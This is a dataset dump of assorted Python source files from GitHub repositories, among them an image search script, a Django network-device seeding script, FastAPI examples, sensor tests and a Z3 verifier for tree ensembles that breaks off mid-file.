blob_id: string (length 40) | directory_id: string (length 40) | path: string (length 2 to 616) | content_id: string (length 40) | detected_licenses: list (length 0 to 69) | license_type: string (2 classes) | repo_name: string (length 5 to 118) | snapshot_id: string (length 40) | revision_id: string (length 40) | branch_name: string (length 4 to 63) | visit_date: timestamp[us] | revision_date: timestamp[us] | committer_date: timestamp[us] | github_id: int64 (2.91k to 686M, nullable) | star_events_count: int64 (0 to 209k) | fork_events_count: int64 (0 to 110k) | gha_license_id: string (23 classes) | gha_event_created_at: timestamp[us] | gha_created_at: timestamp[us] | gha_language: string (213 classes) | src_encoding: string (30 classes) | language: string (1 class) | is_vendor: bool (2 classes) | is_generated: bool (2 classes) | length_bytes: int64 (2 to 10.3M) | extension: string (246 classes) | content: string (length 2 to 10.3M) | authors: list (length 1) | author_id: string (length 0 to 212)
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
56b43d777dfaf6cb5b85e231c3a813f494637947
|
d03e5154b1b92616b9dbbef450f08d8fa32b04a9
|
/search_spatial_verify.py
|
a08858f19839f155f97b402830cb6cce4487c313
|
[] |
no_license
|
xiej23/image_search_engine
|
1a3dd670b3e1475f39e79ac3ac2279680760df9e
|
e46c4350890f27e5bb4c7e9f0ce13369b2050f64
|
refs/heads/master
| 2022-10-14T11:09:49.415703
| 2020-06-15T16:19:49
| 2020-06-15T16:19:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,586
|
py
|
# import the necessary packages
from __future__ import print_function
from descriptors.detectanddescribe import DetectAndDescribe
from ir.bagofvisualwords import BagOfVisualWords
from ir.spatialverifier import SpatialVerifier
from ir.searcher import Searcher
from resultmontage import ResultsMontage
from scipy.spatial import distance
from redis import Redis
from imutils.feature import FeatureDetector_create, DescriptorExtractor_create
import argparse
import pickle
import imutils
import json
import cv2
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-d", "--dataset", required=True, help="Path to the directory of indexed images")
ap.add_argument("-f", "--features-db", required=True, help="Path to the features database")
ap.add_argument("-b", "--bovw-db", required=True, help="Path to the bag-of-visual-words database")
ap.add_argument("-c", "--codebook", required=True, help="Path to the codebook")
ap.add_argument("-i", "--idf", required=True, help="Path to inverted document frequencies array")
ap.add_argument("-r", "--relevant", required=True, help = "Path to relevant dictionary")
ap.add_argument("-q", "--query", required=True, help="Path to the query image")
args = vars(ap.parse_args())
# initialize the keypoint detector, local invariant descriptor, and the descriptor pipeline
detector = FeatureDetector_create("SURF")
descriptor = DescriptorExtractor_create("RootSIFT")
dad = DetectAndDescribe(detector, descriptor)
# load the inverted document frequency array and codebook vocabulary, then
# initialize the bag-of-visual-words transformer
idf = pickle.loads(open(args["idf"], "rb").read())
vocab = pickle.loads(open(args["codebook"], "rb").read())
bovw = BagOfVisualWords(vocab)
# load the relevant queries dictionary and lookup the relevant results for the
# query image
relevant = json.loads(open(args["relevant"]).read())
queryFilename = args["query"][args["query"].rfind("/") + 1:]
queryRelevant = relevant[queryFilename]
# load the query image and process it
queryImage = cv2.imread(args["query"])
cv2.imshow("Query", imutils.resize(queryImage, width=320))
queryImage = imutils.resize(queryImage, width=320)
queryImage = cv2.cvtColor(queryImage, cv2.COLOR_BGR2GRAY)
# extract features from the query image and construct a bag-of-visual-words from it
(queryKps, queryDescs) = dad.describe(queryImage)
queryHist = bovw.describe(queryDescs).tocoo()
# connect to redis and perform the search
redisDB = Redis(host="localhost", port=6379, db=0)
searcher = Searcher(redisDB, args["bovw_db"], args["features_db"], idf=idf, distanceMetric=distance.cosine)
sr = searcher.search(queryHist, numResults=20)
print("[INFO] search took: {:.2f}s".format(sr.search_time))
# spatially verify the results
spatialVerifier = SpatialVerifier(args["features_db"], idf, vocab)
sv = spatialVerifier.rerank(queryKps, queryDescs, sr, numResults=20)
print("[INFO] spatial verification took: {:.2f}s".format(sv.search_time))
# initialize the results montage
montage = ResultsMontage((240, 320), 5, 20)
for (i, (score, resultID, resultIdx)) in enumerate(sv.results):
#load the result image and display it
print("[RESULT] {result_num}. {result} - {score:.2f}".format(result_num=i + 1,result=resultID, score=score))
result = cv2.imread("{}/{}".format(args["dataset"], resultID))
montage.addResult(result, text="#{}".format(i + 1),highlight=resultID in queryRelevant)
#show the output image of results
cv2.imshow("Results", imutils.resize(montage.montage, height=700))
cv2.waitKey(0)
searcher.finish()
spatialVerifier.finish()
|
[
"kaushalbhavsar0007@gmail.com"
] |
kaushalbhavsar0007@gmail.com
|
ff448bf4b1dfbc74d3d84fc327f77df4c1b8f27a
|
d93fe0484fc3b32c8fd9b33cc66cfd636a148ec4
|
/Codeforces/ECR91/probC.py
|
598044427a1d17ace008ba31acb2ec56b2763c53
|
[] |
no_license
|
wattaihei/ProgrammingContest
|
0d34f42f60fa6693e04c933c978527ffaddceda7
|
c26de8d42790651aaee56df0956e0b206d1cceb4
|
refs/heads/master
| 2023-04-22T19:43:43.394907
| 2021-05-02T13:05:21
| 2021-05-02T13:05:21
| 264,400,706
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 321
|
py
|
import sys
input = sys.stdin.readline
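# Comment added for clarity (not in the original submission): greedy strategy.
# Sort the skills in descending order and grow the current group one athlete at a time;
# because the list is sorted, the newest member holds the minimum skill, so as soon as
# group_size * current_skill >= X the group qualifies as a team and is closed.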
Q = int(input())
for _ in range(Q):
N, X = map(int, input().split())
A = list(map(int, input().split()))
A.sort(reverse=True)
ans = 0
count = 1
for a in A:
if count*a >= X:
ans += 1
count = 0
count += 1
print(ans)
|
[
"wattaihei.rapyuta@gmail.com"
] |
wattaihei.rapyuta@gmail.com
|
ba40440b518f567412c33fc4f87b3556b4301a36
|
55eef30f9337cffc2b820d2d2c37548d2c2a62da
|
/app/gmail_api.py
|
4f7fe564b52653c5b68230fb4ba8b5945eda50bf
|
[
"Apache-2.0"
] |
permissive
|
jssprz/HerokuFiles
|
9831f877625b3ec75aac6a313e152f7150d7e200
|
858f141e47ed8181c9ebcbb3bd792e989add05da
|
refs/heads/main
| 2023-06-14T18:59:05.106651
| 2021-07-05T15:39:39
| 2021-07-05T15:39:39
| 384,276,578
| 0
| 0
|
Apache-2.0
| 2021-07-09T00:05:57
| 2021-07-09T00:05:57
| null |
UTF-8
|
Python
| false
| false
| 466
|
py
|
import yagmail
from config import *
# Send file by email
yag = yagmail.SMTP(get_gmail_username(), get_gmail_password())
def upload_file(recipient, attachment):
"""
Send email with file
:param recipient: recipient of the email
:param attachment: path of local file to upload
:return:
"""
print(f"attachment {attachment}")
contents = ['Body of email', attachment]
yag.send(recipient, 'subject', contents)
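# Illustrative call (hypothetical recipient and path, not part of the original file):
# upload_file('someone@example.com', '/tmp/report.pdf')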
|
[
"gcatanese@yahoo.com"
] |
gcatanese@yahoo.com
|
7bc7328946d119100d63d0050bae32701856b0b7
|
0973bb00298e4c1d9442f0335d996517f02e8ab4
|
/healingPython/argparse_prac2.py
|
390dffe82ef84ccaaa359d3ed0a6aa9cd62d2d78
|
[
"Apache-2.0"
] |
permissive
|
glayneon/amolang.cloud
|
3db1b038027eb7c1f509d710733072744dee8538
|
9bcba8191f12c858db03b2c7cdb31c441a8a77bd
|
refs/heads/master
| 2020-03-21T04:38:28.887845
| 2019-01-15T08:33:20
| 2019-01-15T08:33:20
| 138,119,763
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,276
|
py
|
#!python
import psutil
import logging
import random
import string
import time
import json
import argparse
import os
class slogger:
    '''Create a logger instance that sends messages to STDOUT by default.
This class will make an instance using logging module.
Returns:
logging instance.
'''
_FMT = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
def __init__(self):
'''
Initiator
'''
self.logger = logging.getLogger(__name__)
self.logger.setLevel(logging.INFO)
log2std = logging.StreamHandler()
log2std.setLevel(logging.INFO)
logFormat = logging.Formatter(self._FMT)
log2std.setFormatter(logFormat)
self.logger.addHandler(log2std)
self.logger.info("{} : Complete setting logger ...".format(self.__class__))
class randomFile(slogger):
    '''Build an absolute path consisting of a date-based sub-folder and a filename made of 16 random characters.
This class will make the absolute file path and name using random, string and time modules.
Returns:
random path instance.
'''
def __init__(self, verbose=False):
'''
Initiator
'''
super().__init__()
self.cwd = os.getcwd()
if verbose:
self.logger.info("Verbose mode is On ...")
def randomPath(self, targetDir=None):
'''
return random path
'''
self.targetDir = targetDir
tmpName = random.sample(string.ascii_letters, 12) + random.sample(string.digits, 4)
random.shuffle(tmpName)
if isinstance(self.targetDir, str):
self.randomName = self.targetDir + os.sep + time.strftime("%Y%m%d") + os.sep + ''.join(tmpName) + "_" + time.strftime("%H%M%S")
else:
self.targetDir = self.cwd
self.randomName = self.targetDir + os.sep + time.strftime("%Y%m%d") + os.sep + ''.join(tmpName) + "_" + time.strftime("%H%M%S")
self.logger.info("{} is generating now ...".format(self.randomName))
return self.randomName
class processStatus(slogger):
'''Check process status and return its status.
This class will check and return.
Parameters:
ProcessName (string)
Returns:
status instance.
'''
def __init__(self, verbose=False):
'''
Initiator
'''
super().__init__()
if verbose:
self.logger.info("Verbose mode is On ...")
def searchProcess(self, processName=None):
'''
Search Process using processName variable.
'''
_foundit = False
if isinstance(processName, str):
self.processName = processName
self.logger.info("Start searching {} in all processes ...".format(self.processName))
self.pslistNow = psutil.process_iter(attrs=['name', 'pid'])
for i in self.pslistNow:
if i.info['name'].lower() == self.processName.lower():
self.targetProcess = psutil.Process(i.info['pid'])
self.logger.info("{} status : {} ...".format(i.info['name'], self.targetProcess.status))
_foundit = True
else:
if _foundit:
self.logger.info("Searching is done ... ")
else:
self.logger.info("There's no named {} process now.".format(i.info['name']))
if __name__ == '__main__':
_verbose = False
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--verbose', help='increase the level of verbosity', action="store_true")
parser.add_argument('-d', '--dir', help='generate random filename using a given path', action='append')
parser.add_argument('-p', '--process', help='check the status of a given process', action='append')
args = parser.parse_args()
if args.verbose:
_verbose = True
if args.dir:
a = randomFile(verbose=_verbose)
for i in args.dir:
fileName = a.randomPath(targetDir=i)
a.logger.info("Random Path is {} ...".format(fileName))
if args.process:
b = processStatus(verbose=_verbose)
for i in args.process:
b.searchProcess(processName=i)
|
[
"yeraongon@gmail.com"
] |
yeraongon@gmail.com
|
67c2e46759a10cb31fe6e793beb35e7c09bfe4d5
|
5d5e13a94439792e7ee064875e373f555075d16d
|
/user/management/commands/add_user.py
|
9dacff713072a1e6f6ab807f7b45aa4b7a3b7218
|
[] |
no_license
|
Ishtiaq11/task_project
|
d39d44948df52ee24a46b037cc45475ba53ca9c2
|
462bc6b87ccfb2e49c7d9ebca8319eee2f5a1e95
|
refs/heads/main
| 2023-04-14T12:23:51.093886
| 2021-04-24T13:13:36
| 2021-04-24T13:13:36
| 356,129,910
| 0
| 0
| null | 2021-04-24T13:13:36
| 2021-04-09T04:04:09
|
Python
|
UTF-8
|
Python
| false
| false
| 1,191
|
py
|
from faker import Faker
from user.models import Role
from django.contrib.auth.models import User
from django.core.management.base import BaseCommand
class Command(BaseCommand):
help = 'Add new user'
def handle(self, *args, **kwargs):
Role.objects.all().delete()
User.objects.all().delete()
username = 'admin'
user = User.objects.create_user(username=username, password='123456', email='admin@admin.com',
first_name='Admin', last_name='Example')
user.is_superuser = False
user.is_staff = True
user.save()
role = Role(user_id=user.id, is_admin=True)
role.save()
for i in range(5):
fake = Faker()
name = fake.first_name()
user = User.objects.create_user(username=name.lower(), password='123456', email=fake.email(),
first_name=name, last_name=fake.last_name())
user.is_superuser = False
user.is_staff = False
user.save()
role = Role(user_id=user.id, is_admin=False)
role.save()
self.stdout.write('Added new user')
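# Usage note (added for clarity, assuming the `user` app is listed in INSTALLED_APPS):
# since this file lives under user/management/commands/, Django exposes it as
#     python manage.py add_user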
|
[
"rakibul.gononet@gmail.com"
] |
rakibul.gononet@gmail.com
|
64e00704caba99d1ada7ac855af53f7c04a28844
|
55c6343fa98a97ca375b53e244adfcf721fb68e5
|
/djangoProject/qyt_devices/insert_db/__init__.py
|
8a1e29255b843e436ee4e547a3841e38559e51ee
|
[] |
no_license
|
Prin-Meng/NetDevOps
|
7a835879fb55c26b792d06c729dcaf58c1427c5a
|
c852cdee300135320c3844c42755f0f6b1b6688a
|
refs/heads/master
| 2023-06-01T22:39:49.041141
| 2021-06-20T02:34:00
| 2021-06-20T02:34:00
| 345,110,429
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,877
|
py
|
import django
import os
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'djangoProject.settings')
django.setup()
import time
from qyt_devices.tools.snmpv2_get import snmpv2_get
from qyt_devices.models import Devicetype, SNMPtype, DeviceSNMP, Devicedb, Devicecpu
# Delete the existing data
Devicecpu.objects.all().delete()
Devicedb.objects.all().delete()
Devicetype.objects.all().delete()
DeviceSNMP.objects.all().delete()
SNMPtype.objects.all().delete()
# -------------------------- Device types ------------------------------
device_type = ['CSR1000v','ASA']
for name in device_type:
device_type_router = Devicetype(name=name)
device_type_router.save()
# -------------------------- Device SNMP types ---------------------------
snmp_type = ['CPU Total 5Sec']
for name in snmp_type:
snmp_type_router = SNMPtype(name=name)
snmp_type_router.save()
# -------------------------- Device SNMP -----------------------------
device_snmp = [{'oid': '1.3.6.1.4.9.9.109.1.1.1.3.7',
'device_type_name': 'CSR1000v',
'snmp_type_name': 'CPU Total 5Sec'
}, ]
for dict_info in device_snmp:
device_snmp_router = DeviceSNMP(
oid=dict_info['oid'],
device_type=Devicetype.objects.get(name=dict_info['device_type_name']),
snmp_type=SNMPtype.objects.get(name=dict_info['snmp_type_name'])
)
device_snmp_router.save()
# -------------------------- Device information ------------------------------
device_db = [{'device_name': '网关路由器',
'device_ip': '192.168.0.66',
'description': '乾颐堂网络实验室',
'snmp_ro_community': 'tcpipro',
'snmp_rw_community': 'tcpiprw',
'ssh_username': 'prin',
'ssh_password': 'Cisc0123',
'enable_password': 'cisco',
'device_type_name': 'CSR1000v'
},
{'device_name': '核心路由器',
'device_ip': '192.168.0.88',
'description': '乾颐堂网络实验室',
'snmp_ro_community': 'tcpipro',
'snmp_rw_community': 'tcpiprw',
'ssh_username': 'prin',
'ssh_password': 'Cisc0123',
'enable_password': 'cisco',
'device_type_name': 'CSR1000v'
}]
for dict_info in device_db:
device_db_router = Devicedb(
name=dict_info['device_name'],
ip=dict_info['device_ip'],
description=dict_info['description'],
snmp_ro_community=dict_info['snmp_ro_community'],
snmp_rw_community=dict_info['snmp_rw_community'],
ssh_username=dict_info['ssh_username'],
ssh_password=dict_info['ssh_password'],
enable_password=dict_info['enable_password'],
type=Devicetype.objects.get(name=dict_info['device_type_name'])
)
device_db_router.save()
# -------------------------- Device CPU information ----------------------------
print('Collecting information......')
for x in range(10):
snmpv2_info = snmpv2_get("192.168.0.66", "tcpipro", "1.3.6.1.4.1.9.9.109.1.1.1.1.3.7", port=161)
device_cpu_router = Devicecpu(device=Devicedb.objects.get(name='网关路由器'), cpu_usage=snmpv2_info[1])
device_cpu_router.save()
# snmpv2_info = snmpv2_get("192.168.0.88", "tcpipro", "1.3.6.1.4.1.9.9.109.1.1.1.1.3.7", port=161)
# device_cpu_router = Devicecpu(device=Devicedb.objects.get(name='核心路由器'), cpu_usage=snmpv2_info[1])
#
# device_cpu_router.save()
time.sleep(1)
gw = Devicedb.objects.get(name='网关路由器')
print(gw)
# perform lookups through the foreign-key relations
snmp_info = gw.type.devicesnmp.all()
for snmp in snmp_info:
print(f"SNMP类型:{snmp.snmp_type.name:<20}| OID:{snmp.oid}")
cpu_info = gw.cpu_usage.all()
for cpu in cpu_info:
print(f"CPU利用率:{cpu.cpu_usage:<5}| 记录时间:{cpu.record_datetime.strftime('%Y-%m-%d %H:%M:%S')}")
|
[
"772062725@qq.com"
] |
772062725@qq.com
|
d5ca3132b484042d95161fff6c873954396d1563
|
f6cb1b34668f4e864836c595efce40083baa8f91
|
/tests2/tests/fbttn/test_sensor.py
|
94e28644f7309226bb77717cdcae9373616fa8da
|
[] |
no_license
|
isabella232/openbmc
|
d419d61092f457d2c25a057831fc8d56cd482e8a
|
7a0ece893ac2d985af85701d8a003fa62a34cae0
|
refs/heads/helium
| 2023-04-06T06:29:29.854842
| 2021-04-16T01:04:35
| 2021-04-16T01:54:48
| 358,585,013
| 0
| 0
| null | 2021-04-16T12:02:45
| 2021-04-16T12:01:40
| null |
UTF-8
|
Python
| false
| false
| 1,571
|
py
|
#!/usr/bin/env python3
#
# Copyright 2018-present Facebook. All Rights Reserved.
#
# This program file is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program in a file named COPYING; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301 USA
#
import unittest
from common.base_sensor_test import SensorUtilTest
from tests.fbttn.test_data.sensors.sensors import SENSORS
class MBSensorTest(SensorUtilTest, unittest.TestCase):
FRU_NAME = "server"
def set_sensors_cmd(self):
self.sensors_cmd = ["/usr/local/bin/sensor-util {}".format(self.FRU_NAME)]
def test_sensor_keys(self):
result = self.get_parsed_result()
for key in SENSORS[self.FRU_NAME]:
with self.subTest(sensor=key):
self.assertIn(key, result.keys(), "Missing sensor {}".format(key))
class NicSensorTest(MBSensorTest):
FRU_NAME = "nic"
class IOMSensorTest(MBSensorTest):
FRU_NAME = "iom"
class DPBSensorTest(MBSensorTest):
FRU_NAME = "dpb"
class SCCSensorTest(MBSensorTest):
FRU_NAME = "scc"
|
[
"facebook-github-bot@users.noreply.github.com"
] |
facebook-github-bot@users.noreply.github.com
|
5e8bc96eb0f62899702d662ace41b95f18a39518
|
88a925c350db834972db7190f41d776d20f4345d
|
/fastapi/basic/response_model.py
|
a530b18388d21630e05d115c75f868dc79c26837
|
[] |
no_license
|
IndominusByte/deeplearn-all-stuff-fastapi
|
037b0c032895790f5becf9a1ebd10af337a4249f
|
81c60e603081aae5f0b16e9a4d62e894b966df3e
|
refs/heads/master
| 2022-12-26T00:52:34.810929
| 2020-10-03T09:42:45
| 2020-10-03T09:42:45
| 293,742,975
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,983
|
py
|
from fastapi import FastAPI
from pydantic import BaseModel, EmailStr, SecretStr
from typing import Optional, List
class Item(BaseModel):
name: str
description: Optional[str] = None
price: float
tax: Optional[float] = None
tags: List[str] = []
class Config:
min_anystr_length = 1
anystr_strip_whitespace = True
app = FastAPI()
"""
The response model is declared in this parameter instead of as a function return type annotation, because the path function may not actually return that response model but rather return a dict, database object or some other model, and then use the response_model to perform the field limiting and serialization.
"""
@app.post('/items', response_model=Item)
def create_items(item: Item):
return item
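# Illustrative sketch (not in the original file): the handler may also return a plain
# dict; FastAPI still validates and serializes it through the declared response_model,
# so keys that are not fields of Item are dropped from the response.
# @app.post('/items-from-dict', response_model=Item)
# def create_item_from_dict():
#     return {"name": "hammer", "price": 9.99, "internal_note": "not part of Item"}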
# best practice
class UserIn(BaseModel):
username: str
password: SecretStr
email: EmailStr
fullname: Optional[str] = None
class UserOut(BaseModel):
username: str
email: EmailStr
fullname: Optional[str] = None
# @app.post('/user', response_model=UserOut)
# def create_user(user: UserIn):
# return user
"""
You can set the path operation decorator parameter response_model_exclude_unset=True
and those default values won't be included in the response, only the values actually set.
You can also use:
- response_model_exclude_defaults=True
- response_model_exclude_none=True
"""
# @app.post('/user', response_model=UserOut, response_model_exclude_unset=True)
# def create_user(user: UserIn):
# return user
"""
You can also use the path operation decorator parameters response_model_include and response_model_exclude. like pydantic except you should add response_model at beginning
"""
# @app.post('/user', response_model=UserOut, response_model_include={'username','email'})
# def create_user(user: UserIn):
# return user
@app.post('/user', response_model=UserOut, response_model_exclude={'username','email'})
def create_user(user: UserIn):
return user
|
[
"nyomanpradipta120@gmail.com"
] |
nyomanpradipta120@gmail.com
|
28371737c4499d4f72faf4720e96071758777642
|
9d40c348e256bd74455521a7a11d8a4ab5d0d9f0
|
/test_etest/test_fixtures/test_scripts/7d982739ef8348d48935d14cb74f160d.py
|
2e1f28c61605c8c7c4ae4761faf3deaaa2518ba2
|
[] |
no_license
|
tianon/etest
|
acf5bd2f06cf9a5024353cfc8128c3e968b889c2
|
01f24e46caaa3c75c48c43e59a8c03da81e06e3b
|
refs/heads/master
| 2021-01-17T20:11:43.244552
| 2015-05-03T15:10:06
| 2015-05-03T15:10:33
| 36,564,139
| 0
| 0
| null | 2015-05-30T15:38:31
| 2015-05-30T15:38:31
| null |
UTF-8
|
Python
| false
| false
| 638
|
py
|
# Copyright (C) 2014 by Alex Brandt <alunduil@alunduil.com>
#
# etest is freely distributable under the terms of an MIT-style license.
# See COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_etest.test_fixtures.test_scripts import SCRIPTS
_ = '''
python_test() {
nosetests || die "Tests failed under ${EPYTHON}"
}
''' # flake8: noqa — inline bash script with tabs
_ = {
'uuid': '7d982739ef8348d48935d14cb74f160d',
'description': 'function definition',
'text': _,
'symbols': {
},
'correct': None,
}
SCRIPTS.setdefault('all', []).append(_)
SCRIPTS.setdefault('bash', []).append(_)
|
[
"alunduil@alunduil.com"
] |
alunduil@alunduil.com
|
4a3d9d581d12ea1ae3ea021e342e85d3169f537d
|
6d443be5a5dbff062257cd40c4f5b4945812004b
|
/qtas/ensemble.py
|
9de83db94dbfa762a7200ef6bbf7bc28916e6aa3
|
[
"BSD-3-Clause"
] |
permissive
|
nokia/gradient-boosted-models-verifier
|
fe83f1e918b75deec30ff3bb0e1e67fa8fa1add9
|
e2db19d86e39cb2b82a3f6249305459f18b7fda4
|
refs/heads/main
| 2023-05-30T23:30:18.851292
| 2021-06-14T07:16:25
| 2021-06-14T07:16:25
| 374,602,869
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 18,222
|
py
|
# -*- coding: utf-8 -*-
# © 2018-2019 Nokia
#
#Licensed under the BSD 3 Clause license
#SPDX-License-Identifier: BSD-3-Clause
import numpy
import math  # needed for the math.isinf checks below
from z3 import * # @UnusedWildImport
from sklearn.ensemble import GradientBoostingClassifier
# from sklearn.tree import _tree
from xgboost.sklearn import XGBClassifier
from .xgbparser import parse_trees
from . import VeriGbError
class IDecisionTreeEnsembleFormalRegressorModel():
'''
An interface for decision tree ensemble regressor or a single classifier class.
When class_label is not provided, this represent a single regression model.
If class_label is given, then it represent a single class within a classification model.
'''
def __init__(self, solver_mng, metadata, class_label):
'''
metadata.get_num_labels() must be strictly greater than class_label.
regressor is the special case where metadata.get_num_labels()=1 and class_label=0.
:param solver_mng: variable manager
:param metadata:
:param class_label:
'''
self.solver_mng = solver_mng
self.class_label = class_label
self.metadata = metadata
if (self.class_label >= self.metadata.get_num_labels()):
raise VeriGbError("wrong label invocation of tree ensemble")
#
def _close_construction(self,model_id):
'''
Can and must be called at the end of the child construction
(only after the child information is all set up and ready...).
'''
model_id=str(model_id)
for tree_idx in range(self.get_num_trees()):
self.solver_mng.create_aux_var("%sL%sOUT%s" % (str(model_id),self.get_label(), tree_idx))
self.solver_mng.create_aux_var('L%sSUM%s' % (self.get_label(),model_id))
self.solver_mng.create_output_var('OUTPUT%s' %model_id )
def __get_sum_variable(self,i):
new_sum='L%sSUM'+str(i)
return self.solver_mng.get_aux_var(new_sum % self.get_label())
def __get_tree_val_variable(self, tree_idx,i):
return self.solver_mng.get_aux_var("%sL%sOUT%s" % (str(i),self.get_label(), tree_idx))
def get_gt_constraints(self, other_regressor_ensemble):
return (self.__get_sum_variable(1) > other_regressor_ensemble.__get_sum_variable(1))
def get_label(self):
return self.class_label
def get_num_classes(self):
return self.metadata.get_num_labels()
def get_ge_zero(self,i):
return (self.__get_sum_variable(i) >= 0)
def get_ensemble_expr(self, observation=None, epsilon=float('inf'), min_val=float('-inf'), max_val=float('inf'), optimize_l1=False, i=0):
'''
Note that in order to get a general ensemble expression (not related to an observation),
you can simply invoke this function without setting anything to epsilon...
In such a case observation will be ignored...
Also note that the min_val, max_val (and epsilon as well) limits the tree walk (removes branches),
it DOES NOT mean that the assigned value cannot be below or above resp.
The restriction to the assignment needs to be done through the property!
:param observation:
:param epsilon:
:param min_val:
:param max_val:
:param optimize_l1:
'''
trees_expr = True
# TODO: check for z3.Sum
sum_expr = self.get_base_predictor()
for tree_idx in range(0, self.get_num_trees()):
# evaluated the tree itself
trees_expr = And(trees_expr, self.get_tree_clause_expr(tree_idx, observation, epsilon, min_val, max_val, optimize_l1,i))
# accumulate the sum expression
sum_expr = sum_expr + self.__get_tree_val_variable(tree_idx,i)
# final expression
return And(trees_expr, (self.__get_sum_variable(i) == sum_expr))
def get_tree_clause_expr(self, tree_idx, observation=None, epsilon=float('inf'), min_val=float('-inf'), max_val=float('inf'), optimize_l1=False,indx=1):
num_of_features = self.metadata.get_num_features()
if (isinstance(min_val, list) and (len(min_val) != num_of_features)):
raise VeriGbError("array length do not match")
if (isinstance(max_val, list) and (len(max_val) != num_of_features)):
raise VeriGbError("array length do not match")
if (isinstance(epsilon, list) and (len(epsilon) != num_of_features)):
raise VeriGbError("array length do not match")
if (isinstance(epsilon, list) and optimize_l1):
raise VeriGbError("epsilon cannot be a list for l1 optimisation")
if (isinstance(observation, list) and (len(observation) != num_of_features)):
raise VeriGbError("array length do not match")
if (epsilon == float('inf')):
observation = numpy.zeros(num_of_features)
lower_range = numpy.zeros(num_of_features)
upper_range = numpy.zeros(num_of_features)
for i in range(num_of_features):
min_v = min_val if (not isinstance(min_val, list)) else min_val[i]
max_v = max_val if (not isinstance(max_val, list)) else max_val[i]
epsilon_v = epsilon if (not isinstance(epsilon, list)) else epsilon[i]
#
upper_range[i] = min(observation[i] + abs(epsilon_v), max_v)
if (math.isinf(epsilon_v) and math.isinf(max_v)): upper_range[i] = float('inf')
lower_range[i] = max(observation[i] - abs(epsilon_v), min_v)
if (math.isinf(epsilon_v) and math.isinf(min_v)): lower_range[i] = float('-inf')
tree_instance = self.get_tree(tree_idx)
def build_tree_clause_helper(node_idx, depth, ret_constraint_list, accum_min_epsi, rec_accum=[],indx=1):
feature_idx = tree_instance.feature[node_idx]
# stop case...
if(self.is_leaf(tree_idx, node_idx)):
# val = self.get_learning_rate() * self.get_node_value(tree_idx, node_idx)
val = self.get_node_value(tree_idx, node_idx)
rec_accum.append(self.__get_tree_val_variable(tree_idx,indx) == val)
if (not optimize_l1):
ret_constraint_list.append(And(*rec_accum))
# else, optimize_l1 is True
elif ((not isinstance(epsilon, list)) and (accum_min_epsi <= epsilon)):
ret_constraint_list.append(And(*rec_accum))
# else: # not adding this path
# print("-- removing un-necessary branch...!")
rec_accum.pop()
return
# else..
FEATURE_VAR = self.solver_mng.get_feature_var(self.metadata.get_feature_names(feature_idx))
#==============================================================
# Note: if the lower range is not relevant, then it will skip this part.
new_accum_min_epsi = accum_min_epsi
if (self.get_node_condition(tree_idx, node_idx, lower_range[feature_idx])):
if (isinstance(observation, list) and (not self.get_node_condition(tree_idx, node_idx, observation[feature_idx]))):
new_accum_min_epsi += abs(observation[feature_idx] - self.get_node_threshold(tree_idx, node_idx))
rec_accum.append(self.get_node_condition(tree_idx, node_idx, FEATURE_VAR))
build_tree_clause_helper(self.get_true_child(tree_idx, node_idx), depth + 1, ret_constraint_list, new_accum_min_epsi, rec_accum,indx)
rec_accum.pop()
new_accum_min_epsi = accum_min_epsi
if (not self.get_node_condition(tree_idx, node_idx, upper_range[feature_idx])):
if (isinstance(observation, list) and (self.get_node_condition(tree_idx, node_idx, observation[feature_idx]))):
new_accum_min_epsi += abs(self.get_node_threshold(tree_idx, node_idx) - observation[feature_idx])
rec_accum.append(Not(self.get_node_condition(tree_idx, node_idx, FEATURE_VAR)))
build_tree_clause_helper(self.get_false_child(tree_idx, node_idx), depth + 1, ret_constraint_list, new_accum_min_epsi, rec_accum,indx)
rec_accum.pop()
# # invoking the recursive all...
constraint_list = []
build_tree_clause_helper(0, 1, constraint_list, 0,indx=indx)
return Or(*constraint_list)
#===========================================================================
# # abstract interfaces
#===========================================================================
def get_base_predictor(self):
raise NotImplementedError("Not implemented yet")
def get_learning_rate(self):
raise NotImplementedError("Not implemented yet")
def get_num_trees(self):
raise NotImplementedError("Not implemented yet")
def get_tree(self, tree_idx):
raise NotImplementedError("Not implemented yet")
def get_node_condition(self, tree_idx, node_idx, val):
'''
Note that this getter can be used with a scalar value 'val', in which case
it will return True/False, or an SMT variable in which case it will return
an expression.
:param tree_idx:
:param node_idx:
:param val:
'''
raise NotImplementedError("Not implemented yet")
def get_true_child(self, tree_idx, node_idx):
raise NotImplementedError("Not implemented yet")
def get_false_child(self, tree_idx, node_idx):
raise NotImplementedError("Not implemented yet")
def is_leaf(self, tree_idx, node_idx):
raise NotImplementedError("Not implemented yet")
def get_node_value(self, tree_idx, node_idx):
raise NotImplementedError("Not implemented yet")
def get_node_threshold(self, tree_idx, node_idx):
raise NotImplementedError("Not implemented yet")
# Adapter
class SklFormalRegressorModel(IDecisionTreeEnsembleFormalRegressorModel):
'''
sklearn implementation
'''
def __init__(self, solver_mng, metadata, skl_gb_regression_model, class_label,model_id):
IDecisionTreeEnsembleFormalRegressorModel.__init__(self, solver_mng, metadata, class_label)
self.model = skl_gb_regression_model;
# only now we know the amount of trees --> finishing the super constructor
IDecisionTreeEnsembleFormalRegressorModel._close_construction(self, model_id)
def get_base_predictor(self):
# FIXME: check if correct for regressor case
return self.model.init_.priors[self.get_label()]
def get_learning_rate(self):
return self.model.learning_rate
def get_num_trees(self):
